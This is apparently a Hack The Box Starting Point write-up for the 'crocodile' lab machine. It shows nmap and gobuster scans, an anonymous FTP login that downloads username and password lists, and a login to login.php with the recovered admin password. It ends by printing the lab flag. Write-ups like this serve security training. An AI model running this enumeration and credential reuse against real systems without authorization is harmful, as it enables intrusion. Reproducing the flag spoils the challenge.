index

In this walkthrough, we exploit a misconfigured vsFTPd 3.0.3 service and weak credentials to gain initial access and retrieve sensitive information, including a flag.

Reconnaissance

We begin by scanning the target 10.129.75.248 with Nmap to identify open ports and running services.

1
└─$ sudo nmap -sV -sC 10.129.75.248
2
Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-02-08 13:10 WIB
3
Nmap scan report for 10.129.75.248
4
Host is up (0.28s latency).
5
Not shown: 998 closed tcp ports (reset)
6
PORT   STATE SERVICE VERSION
7
21/tcp open  ftp     vsftpd 3.0.3
8
| ftp-syst:
9
|   STAT:
10
| FTP server status:
11
|      Connected to ::ffff:10.10.14.9
12
|      Logged in as ftp
13
|      TYPE: ASCII
14
|      No session bandwidth limit
15
|      Session timeout in seconds is 300
16
|      Control connection is plain text
17
|      Data connections will be plain text
18
|      At session startup, client count was 1
19
|      vsFTPd 3.0.3 - secure, fast, stable
20
|_End of status
21
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
22
| -rw-r--r--    1 ftp      ftp            33 Jun 08  2021 allowed.userlist
23
|_-rw-r--r--    1 ftp      ftp            62 Apr 20  2021 allowed.userlist.passwd
24
80/tcp open  http    Apache httpd 2.4.41 ((Ubuntu))
25
|_http-title: Smash - Bootstrap Business Template
26
|_http-server-header: Apache/2.4.41 (Ubuntu)
27
Service Info: OS: Unix
28

29
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
30
Nmap done: 1 IP address (1 host up) scanned in 30.90 seconds

Analysis of Scan Results

Port 21 (FTP) is open, running vsFTPd 3.0.3.
Anonymous login is enabled, meaning we can access files without credentials.
Port 80 (HTTP) is open, hosting an Apache web server.

Exploring FTP for Credential Discovery

Since anonymous FTP login is allowed, we connect and check for files:

1
└─$ ftp 10.129.75.248
2
Connected to 10.129.75.248.
3
220 (vsFTPd 3.0.3)
4
Name (10.129.75.248:w1thre): anonymous
5
230 Login successful.
6
Remote system type is UNIX.
7
Using binary mode to transfer files.
8
ftp> ls
9
229 Entering Extended Passive Mode (|||49415|)
10
150 Here comes the directory listing.
11
-rw-r--r--    1 ftp      ftp            33 Jun 08  2021 allowed.userlist
12
-rw-r--r--    1 ftp      ftp            62 Apr 20  2021 allowed.userlist.passwd
13
226 Directory send OK.
14
ftp> get allowed.userlist
15
local: allowed.userlist remote: allowed.userlist
16
229 Entering Extended Passive Mode (|||45473|)
17
150 Opening BINARY mode data connection for allowed.userlist (33 bytes).
18
100% |************************************************|    33       81.58 KiB/s    00:00 ETA
19
226 Transfer complete.
20
33 bytes received in 00:00 (0.12 KiB/s)
21
ftp> get allowed.userlist.passwd
22
local: allowed.userlist.passwd remote: allowed.userlist.passwd
23
229 Entering Extended Passive Mode (|||44218|)
24
150 Opening BINARY mode data connection for allowed.userlist.passwd (62 bytes).
25
100% |************************************************|    62      181.82 KiB/s    00:00 ETA
26
226 Transfer complete.
27
62 bytes received in 00:00 (0.22 KiB/s)
28
ftp> exit
29
221 Goodbye.

Examining the files:

1
┌──(w1thre㉿hackbox)-[/mnt/…/cybersec/hackthebox/starting_point/crocodile]
2
└─$ ls
3
allowed.userlist  allowed.userlist.passwd
4

5
┌──(w1thre㉿hackbox)-[/mnt/…/cybersec/hackthebox/starting_point/crocodile]
6
└─$ cat allowed.userlist
7
aron
8
pwnmeow
9
egotisticalsw
10
admin
11

12
┌──(w1thre㉿hackbox)-[/mnt/…/cybersec/hackthebox/starting_point/crocodile]
13
└─$ cat allowed.userlist.passwd
14
root
15
Supersecretpassword1
16
@BaASD&9032123sADS
17
rKXM59ESxesUFHAd

This suggests possible usernames and passwords for the system.

Enumerate Website Directory

When we open the website, it will look like this:

Seems nothing we can do much in this page. We can run Gobuster to find hidden directories:

1
└─$ gobuster dir --url http://10.129.75.248/ -w /usr/share/seclists/Discovery/Web-Content/directory-list-2.3-small.txt -x php,html
2
===============================================================
3
Gobuster v3.6
4
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
5
===============================================================
6
[+] Url:                     http://10.129.75.248/
7
[+] Method:                  GET
8
[+] Threads:                 10
9
[+] Wordlist:                /usr/share/seclists/Discovery/Web-Content/directory-list-2.3-small.txt
10
[+] Negative Status codes:   404
11
[+] User Agent:              gobuster/3.6
12
[+] Extensions:              php,html
13
[+] Timeout:                 10s
14
===============================================================
15
Starting gobuster in directory enumeration mode
16
===============================================================
17
/.php                 (Status: 403) [Size: 278]
18
/.html                (Status: 403) [Size: 278]
19
/index.html           (Status: 200) [Size: 58565]
20
/login.php            (Status: 200) [Size: 1577]
21
/assets               (Status: 301) [Size: 315] [--> http://10.129.75.248/assets/]

The presence of login.php suggests a login panel. Using the usernames and passwords from the FTP server, we attempt logging in.

Foothold

Looking forward to login.php page, we can use the credentials that we’ve got before admin:rKXM59ESxesUFHAd

After we successfully log in, we can get the flag.

Flag

c7110277ac44d78b6a9fff2232434d16